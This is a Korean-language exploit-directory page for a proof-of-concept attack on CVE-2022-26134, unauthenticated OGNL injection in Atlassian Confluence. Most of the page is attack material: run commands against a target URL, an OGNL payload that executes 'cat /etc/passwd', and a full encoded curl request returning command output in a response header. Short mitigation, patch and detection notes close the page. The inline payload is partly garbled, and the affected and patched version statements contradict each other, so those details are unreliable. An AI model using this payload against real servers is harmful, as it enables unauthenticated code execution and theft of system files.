Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitLabGitLab/0xsamy/cve-2022-26134
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitLab0xsamy/cve-2022-26134

CVE-2022-26134

CVE-2022-26134에 대한 개념 증명 익스플로잇으로, Atlassian Confluence Server 및 Data Center에서 인증되지 않은 OGNL 인젝션 취약점을 통해 원격 코드 실행을 가능하게 합니다.

저장소 보기
3년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

CVE-2022-26134 - OGNL 주입 취약점.

Atlassian Confluence 7.18 이하 제품에 영향을 미치는 원격 코드 실행 취약점을 악용하는 개념 증명 스크립트입니다. OGNL 주입 취약점으로 인해 인증되지 않은 사용자가 Confluence Server 또는 Data Center 인스턴스에서 임의 코드를 실행할 수 있습니다.

영향을 받는 버전

지원되는 모든 Confluence Server 및 Data Center 버전이 영향을 받습니다.
1.3.0 이후부터 7.18.1 이하의 Confluence Server 및 Data Center 버전이 영향을 받습니다.
이 취약점은 심각도에 대해 CVSS 점수가 10점 만점에 10점입니다.

종속성:

  • Python 3.3+
  • pip install -r requirements.txt 명령어로 종속성을 설치할 수 있습니다.

사용 방법:

저장소를 클론하세요.

root@kitploit:~
git clone https://gitlab.com/Naqwada/cve-2022-26134
cd CVE-2022-26134

그런 다음 원하는 명령어로 익스플로잇을 실행할 수 있습니다:

root@kitploit:~
python3 cve-2022-26134.py https://target.com CMD
python3 cve-2022-26134.py https://target.com id
python3 cve-2022-26134.py https://target.com "ps aux"

개념 증명 동영상

CVE-2022-26134 PoC 스크립트

CVE-2022-26134 OGNL 주입 Atlassian Confluence 동영상 PoC

페이로드

root@kitploit:~
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

CURL 명령어 예시:

root@kitploit:~
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D" 

그러면 명령어 실행 결과가 응답 헤더의 X-Cmd-Response 매개변수에 반영됩니다.

공급업체의 완화 지침

Atlassian의 공식 권장 사항을 따르세요:
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

패치된 버전

Atlassian은 이 문제에 대한 패치가 포함된 버전 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 및 7.18.1을 출시했습니다.

탐지 기능

이 취약점은 모든 자체 호스팅 인스턴스에 영향을 미칩니다. WAF를 사용하는 경우 ${가 포함된 URL을 차단할 수 있습니다.

YARA (Volexity 작성): https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/yara.yar

참고

교육 목적으로만 사용하세요.

CVE-2022-26134 핫한 밈

도구 다운로드